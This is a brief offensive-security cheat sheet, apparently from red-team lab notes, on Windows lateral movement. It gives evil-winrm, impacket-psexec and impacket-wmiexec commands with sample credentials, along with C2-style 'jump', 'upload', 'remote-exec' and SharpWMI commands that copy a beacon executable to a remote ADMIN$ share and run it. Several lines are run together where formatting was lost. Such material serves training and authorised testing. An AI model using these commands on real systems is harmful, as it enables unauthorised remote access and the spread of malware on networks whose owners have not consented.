WinRM / PsExec / WMI
WinRM
evil-winrm -i 192.168.83.165 -u enox -p californiaTo use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
# The following lines are desirable for IPv6 capable hosts
dead:beef::1001 COMPATIBILITY.intranet.poojump winrm64 web.dev.cyberbotic.io smbPsExec
impacket-psexec alice:[email protected]jump psexec64 web.dev.cyberbotic.io smbWMI
impacket-wmiexec DEV/[email protected]cd \\web.dev.cyberbotic.io\ADMIN$
upload C:\Payloads\smb_x64.exe
remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
link web.dev.cyberbotic.io TSVCPIPE-df628323-503a-41e3-be54-a332c1161337Access denied? -> (CoInitializeSecurity)
execute-assembly SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"Last updated